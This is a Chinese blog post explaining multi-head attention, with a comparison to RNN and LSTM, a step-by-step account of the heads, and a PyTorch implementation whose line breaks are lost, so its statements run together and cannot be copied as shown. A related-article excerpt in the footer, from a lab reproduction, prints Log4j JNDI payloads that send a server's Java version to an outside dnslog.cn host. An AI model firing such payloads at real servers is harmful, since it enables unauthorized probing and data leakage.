注意力机制(四)(多头注意力机制)

server/2024/12/22 9:24:54/

​🌈 个人主页十二月的猫-CSDN博客
🔥 系列专栏 🏀深度学习基础知识》

      相关专栏: 《机器学习基础知识》

                         🏐《机器学习项目实战》
                         🥎深度学习项目实战(pytorch)》

💪🏻 十二月的寒冬阻挡不了春天的脚步,十二点的黑夜遮蔽不住黎明的曙光 

目录

回顾

注意力机制与RNN、LSTM的对比 

总论

RNN

LSTM

注意力机制

多头注意力机制 

核心思想介绍

如何运用多头注意力机制

1、定义多组参数矩阵W(一般是八组),生成多组Q、K、V

 2、利用多组参数分别训练得到多组结果Z(上下文向量)

3、将多组输出拼接后乘以矩阵W0降低维度

 多头流程图

试图解释

Pytorch代码实现

代码解释 

两种实现思想对比

总结


回顾

在上一篇注意力机制(三)(不同注意力机制对比)-CSDN博客,重点讲了针对QKV来源不同制造的注意力机制的一些变体,包括交叉注意力、自注意力等。这里再对注意力机制理解中的核心要点进行归纳整理

1、注意力机制规定的是对QKV的处理,并不指定QKV的来源

2、注意力机制和RNN、LSTM本身是同级的,都可以用于独立解决时间序列的问题

3、注意力机制相比于RNN、LSTM来说能够学习句子内部的句法特征和语义特征

4、注意力机制能够进行并行运算,解决了RNN、LSTM串行运算的问题。但是也存在注意力机制运算量非常大的问题

5、注意力机制解决了RNN以及LSTM中有由于梯度消失梯度爆炸造成的长期依赖问题

注意力机制与RNN、LSTM的对比 

总论

RNN(递归神经网络):它能够处理序列数据,因为它具有循环的结构,可以保留之前的信息。这种结构模拟了人类思考时的持续性,即我们对当前事物的理解是建立在之前信息的基础上的。然而,传统的RNN在处理长距离依赖时会遇到困难,因为随着时间的推移,梯度可能会消失或爆炸,导致网络难以学习和记住长期的信息。

LSTM(长短时记忆网络):它是RNN的一种改进型,专门设计来解决长期依赖问题。LSTM通过引入三个门(遗忘门、输入门、输出门)的结构来控制信息的流动,从而有效地保存长期的信息。这种结构使得LSTM能够更好地查询较长一段时间内的信息,因为它可以通过“门”结构来决定哪些信息需要被记住或遗忘。

注意力机制:它是一种允许模型在处理序列时动态地关注不同部分信息的方法。注意力机制可以与RNN和LSTM结合使用,也可以独立使用。它的优点是可以提高模型对序列中重要信息的敏感度,从而提高模型的性能。注意力机制通过计算注意力权重来分配对不同时间步的关注,这使得模型在每个时间步都能够考虑到整个序列的信息。

RNN

        由于RNN在反向传播过程中涉及到矩阵的连乘,这可能导致梯度指数级减小(梯度消失)或增大(梯度爆炸)。梯度消失会使得网络难以学习和传递长期的依赖关系,因为梯度变得太小,以至于反向传播时权重更新几乎停滞(遗忘,不再考虑这个信息)。相反,梯度爆炸会导致梯度过大,使得网络训练不稳定甚至发散

LSTM

        LSTM就是应对RNN长期依赖问题而产生的。LSTM利用遗忘门、输出输入门以及特殊结构——记忆单元使得长期的信息能够被模型记忆并传递下来从而一定程度上解决了RNN因梯度消失、爆炸出现的长期依赖问题

        但是LSTM在序列很长时仍然会出现梯度消失梯度爆炸的问题,并且LSTM并不能实现并行运算。同时,LSTM在应对并不能很好的捕捉一个序列后面的信息(因为因果卷积的问题),所有导致LSTM并不能很好的理解句子的语法和句法特征

注意力机制

        注意力机制相比于前两个模型的特点在于:1、能够进行并行运算;2、能够完美解决长期依赖问题;3、由于对句子有全面的相似度计算,能够更好理解句子的句法特征和语义特征

上图体现了注意力机制对句子句法特征的理解

 上图体现了注意力机制对句子语法特征的理解

多头注意力机制 

核心思想介绍

前文,我们介绍了自注意力机制:自注意力的QKV是同源的。同源的好处就是更容易发现序列内部的信息,但是也存在一些可以改进的地方。

例如:对于一个待分析的序列矩阵,它存在许多方面的特征。此时我们要用一个参数矩阵Wq、Wk去分析并学习出序列中的这么多特征。由于参数矩阵的维度是有限的,所以一次性学习多特征的信息必然会造成信息学习的模糊性,所以作者又提出了多头注意力机制

下图为多头注意力机制模型图:

多头注意力机制在以下两个方面提升注意力机制的性能:

  • 它为注意力机制提供了多个投射子空间的可能。它利用多头机制提供了多组的参数矩阵,每组参数矩阵能够通过线性变化将词向量X放入不同的向量空间,从而反映出词向量X的不同特征。多组参数矩阵映射不同向量空间,再将不同向量空间的结果进行整合,如此比单组参数矩阵表示向量特征更加准确
  • 它拓展了模型关注不同位置的能力。多头机制不仅在词向量维度上能够挖掘更多词向量的特征,在词数上也能够同时关注更多的词信息

通过多头注意力机制,我们会为每一个都单独配置QKV的权重矩阵,从而在模型训练中产生不同的QKV矩阵。对于每个头来说,其核心思想和训练方式和自注意力机制是相似的

如何运用多头注意力机制

1、定义多组参数矩阵W(一般是八组),生成多组Q、K、V

多头注意力机制的每一头的处理方式和自注意力机制是相同的,也就是利用输入向量X分别乘上从而得到对应的q、k、v。然后每个头的参数矩阵会在不同初始值的情况下,各自训练自己的参数,最后分别生成不同的Q、K、V(初始值不同最后学习的结果也不同,可以参考梯度下降中的局部最优理解)

下图举了两个头的注意力机制的示意图:

 2、利用多组参数分别训练得到多组结果Z(上下文向量)

 将多组训练得到的参数与V经过mulmat融合得到多组Z。此时的上下文向量Z不仅包含原始的信息也包括对文本上下文注意力的信息,并且这个注意力信息利用多头考虑了多个维度的特征信息

3、将多组输出拼接后乘以矩阵W0降低维度

通过第二步得到多组的Z,为了全面的利用所有Z的信息,我们将Zconcat(拼接在一起),这将得到一个非常长的向量矩阵。由于输出结果Z和输入结果X的向量矩阵维度应该要相同,所以我们利用矩阵W0对结果进行变化降维,得到最终结果

 多头流程图

借用其他大佬翻译的流程图版本

试图解释

深度学习模型都是黑盒子模型,所以没有一个很严谨的解释。这里,我也只能给一个非常模糊且不透彻的解释,希望能帮助大家的理解

假设我们有一句话“The animal didn’t cross the street because it was too tired”

  • 图中绿线和橙线表示两个不同的头
  • 可以看到绿线重点关注的是tired单词,橙线重点关注animal单词。这表明it在高维度上某些特征和animal相似,另外一些特征和tired相似
  • 经过注意力机制调整,it中将包含tire和animal两个单词的信息。模型在分析时,对于it单词也将重点关心tired和animal两个单词

说明上面这句翻译的英语句子中it和animal以及tired的关系度相对较大。我们自己分析这个句子时结果也是这样,因为it就指代animal,同时全句子的重点也就是在animal很tired上

一旦注意力头更多之后,整个模型的解释会变得更难,因此我们不再展开

Pytorch代码实现

import torch
import torch.nn.functional as F
import torch.nn as nn
import mathdef self_attention(query, key, value, dropout=None, mask=None):"""前置参数(自注意力):输入矩阵X形状为(batch_size, seq_len, d_model)Q = torch.matmul(X, W_Q)K = torch.matmul(X, W_K)V = torch.matmul(X, W_V)自注意力计算::param query: Q:param key: K:param value: V:param dropout: drop比率:param mask: 是否mask:return: 经自注意力机制计算后的值"""# d_k指降维后待查询的词向量维度d_k = query.size(-1)  # 防止softmax未来求梯度消失时的d_k# Q,K相似度计算公式:\frac{Q^TK}{\sqrt{d_k}},score的维度就是词数*词数(每两个词语间的相似度)scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)  # Q,K相似度计算# 判断是否要mask,注:mask的操作在QK之后,softmax之前if mask is not None:"""scores.masked_fill默认是按照传入的mask条件中为1的元素所在的索引,在scores中相同的的索引处替换为value,替换值为-1e9,即-(10^9)"""mask.cuda()  # 将mask放入GPU运算#score此时就是一个torch.tensor对象,可以直接用masked_fill函数scores = scores.masked_fill(mask == 0, -1e9)self_attn_softmax = F.softmax(scores, dim=-1)  # 进行softmax# 判断是否要对相似概率分布进行dropout操作if dropout is not None:self_attn_softmax = dropout(self_attn_softmax)# 注意:返回经自注意力计算后的值,以及进行softmax后的相似度(即相似概率分布)# 词数*词数 * 词数*词向量维度 = 全新的 词数*词向量维度。如果是多头的:头数*词数*词向量维度return torch.matmul(self_attn_softmax, value), self_attn_softmaxclass MultiHeadAttention(nn.Module):  # 继承nn.module类"""多头注意力计算"""def __init__(self, head, d_model, dropout=0.1):""":param head: 头数:param d_model: 词向量的维度,必须是head的整数倍:param dropout: drop比率"""super(MultiHeadAttention, self).__init__() # 先初始化父类的属性(子类要用父类的属性和方法)assert (d_model % head == 0)  # 确保词向量维度是头数的整数倍self.d_k = d_model // head  # 被拆分为多头后的某一头词向量的维度,和自注意力降维后维度是相同的self.head = headself.d_model = d_model"""由于多头注意力机制是针对多组Q、K、V,因此有了下面这四行代码,具体作用是,针对未来每一次输入的Q、K、V,都给予参数进行构建其中linear_out是针对多头汇总时给予的参数"""self.linear_query = nn.Linear(d_model, d_model)  # 进行一个普通的全连接层变化,但不修改维度self.linear_key = nn.Linear(d_model, d_model)self.linear_value = nn.Linear(d_model, d_model)self.linear_out = nn.Linear(d_model, d_model)self.dropout = nn.Dropout(p=dropout)self.attn_softmax = None  # attn_softmax是能量分数, 即句子中某一个词与所有词的相关性分数, softmax(QK^T)def forward(self, query, key, value, mask=None):if mask is not None:"""多头注意力机制的线性变换层是4维,是把query[batch, frame_num, d_model]变成[batch, -1, head, d_k]再1,2维交换变成[batch, head, -1, d_k], 所以mask要在第二维(head维)添加一维,与后面的self_attention计算维度一样具体点将,就是:因为mask的作用是未来传入self_attention这个函数的时候,作为masked_fill需要mask哪些信息的依据针对多head的数据,Q、K、V的形状维度中,只有head是通过view计算出来的,是多余的,为了保证mask和view变换之后的Q、K、V的形状一直,mask就得在head这个维度添加一个维度出来,进而做到对正确信息的mask"""mask = mask.unsqueeze(1)n_batch = query.size(0)  # batch_size大小,假设query的维度是:[10, 32, 512],其中10是batch_size的大小"""下列三行代码都在做类似的事情,对Q、K、V三个矩阵做处理其中view函数是对Linear层的输出做一个形状的重构,其中-1是自适应(自主计算)这里本质用的是对词向量的维度进行了拆分,将不同维度放入不同自注意力模型去训练transopose(1,2)是对前形状的两个维度(索引从0开始)做一个交换,这里处理后的quary(batch,head,词数,词维度)假设Linear成的输出维度是:[10, 32, 512],其中10是batch_size的大小注:这里解释了为什么d_model // head == d_k,如若不是,则view函数做形状重构的时候会出现异常"""query = self.linear_query(query).view(n_batch, -1, self.head, self.d_k).transpose(1, 2)  # [b, 8, 32, 64],head=8key = self.linear_key(key).view(n_batch, -1, self.head, self.d_k).transpose(1, 2)   # [b, 8, 32, 64],head=8value = self.linear_value(value).view(n_batch, -1, self.head, self.d_k).transpose(1, 2)  # [b, 8, 32, 64],head=8# x是通过自注意力机制计算出来的值, self.attn_softmax是相似概率分布x, self.attn_softmax = self_attention(query, key, value, dropout=self.dropout, mask=mask)"""首先,交换“head数”和“词数”,这两个维度,结果为(batch, 词数, head数, d_model/head数)对应代码为:`x.transpose(1, 2).contiguous()`然后将“head数”和“d_model/head数”这两个维度合并,结果为(batch, 词数,d_model)contiguous()是重新开辟一块内存后存储x,然后才可以使用.view方法,否则直接使用.view方法会报错"""x = x.transpose(1, 2).contiguous().view(n_batch, -1, self.head * self.d_k)return self.linear_out(x)

代码解释 

代码带有注释细节方面就不在这里解释了,这里重点来看看整体的思想

代码实现的思想和上面说的多头注意力机制存在一点不同。两者核心的思想是相同的,但是具体实现的方式存在区别

两种实现思想对比

第一种思路:上文说QKV是同时将X映射到不同的维度好几份,将X中的词向量维度通过映射在QKV中得到降维目的,降低计算难度。并且让不同份的QKV参数矩阵能够关注X不同的特征,从而其让X的特征值的寻找能够更加细致彻底(如下图)

这里介绍另外一种思路(代码实现采用的,两者核心思路是一样的) :

第二种思路:这里我们不再将X利用参数矩阵直接映射成的QKV,从而实现降维以及多头的效果。而是将词向量维度分为头数*新词向量维度(即 :词向量维度=头数*新词向量维度),此时也就实现了降维、多头两个效果

如此分离之后,有一种更好的理解方式:将词向量特征分为不同的组,将不同的组分给不同的注意力机制模型学习,从而让模型专注学习每个组对应的词向量特征,从而使得模型学习效果更好

(下图将词向量在特征维度上分为四头)

在代码具体实现时,考虑到两者最终的效果差不多,但是上面的这个算法实现起来效率会差很多(参数计算量更大了),所以我们采用的策略会是第二种思路

总结

撰写文章不易,如果文章能帮助到大家,大家可以点点赞、收收藏呀~

十二月的猫在这里祝大家学业有成、事业顺利、情到财来


http://www.ppmy.cn/server/23684.html

相关文章

docker数据卷

概念 卷-文件 数据卷-相当于宿主机和容器之间的一块共享目录,容器停止或者删除不会丢失该目录内的数据 挂载命令 docker run [-it] -v 宿主机目录:容器目录 --privilegetrue [--name] 镜像名-i interact,交互 -t terminal,新开一个终端 --…

Linux进程——进程的概念(PCB的理解)

前言:在了解完冯诺依曼体系结构和操作系统之后,我们进入了Linux的下一篇章Linux进程,但在学习Linux进程之前,一定要阅读理解上一篇内容,理解“先描述,再组织”才能更好的理解进程的含义。 Linux进程学习基…

基于 Spring Boot 博客系统开发(二)

基于 Spring Boot 博客系统开发(二) 本系统是简易的个人博客系统开发,为了更加熟练地掌握SprIng Boot 框架及相关技术的使用。🌿🌿🌿 基于 Spring Boot 博客系统开发(一)&#x1f4…

uniapp制作分页查询功能

效果 代码 标签中 <uni-pagination change"pageChanged" :current"pageIndex" :pageSize"pageSize" :total"pageTotle" class"pagination" /> data中 pageIndex: 1, //分页器页码 pageSize: 10, //分页器每页显示…

LeetCode 每日一题 ---- 【1146.快照数组】

LeetCode 每日一题 ---- 【1146.快照数组】 1146.快照数组方法一&#xff1a;二分查找 1146.快照数组 方法一&#xff1a;二分查找 第一次做到这种补充方法的题目&#xff0c;然后看到输入和输出用例的时候&#xff0c;愣了一下&#xff0c;这输入和输出用例有啥关联啊&#…

力扣33. 搜索旋转排序数组

Problem: 33. 搜索旋转排序数组 文章目录 题目描述思路复杂度Code 题目描述 思路 1.初始化左右指针&#xff1a;首先&#xff0c;定义两个指针left和right&#xff0c;分别指向数组的开始和结束位置。 2.计算中间值&#xff1a;在left和right之间找到中间位置mid。 3.比较中间值…

Spirng 当中 Bean的作用域

Spirng 当中 Bean的作用域 文章目录 Spirng 当中 Bean的作用域每博一文案1. Spring6 当中的 Bean的作用域1.2 singleton 默认1.3 prototype1.4 Spring 中的 bean 标签当中scope 属性其他的值说明1.5 自定义作用域&#xff0c;一个线程一个 Bean 2. 总结:3. 最后&#xff1a; 每…

VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了&#xff0c;环境搭建不讲&#xff0c;网上其他文章很好。 访问该环境&#xff1a; POC 构造&#xff08;任选其一&#xff09;&#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…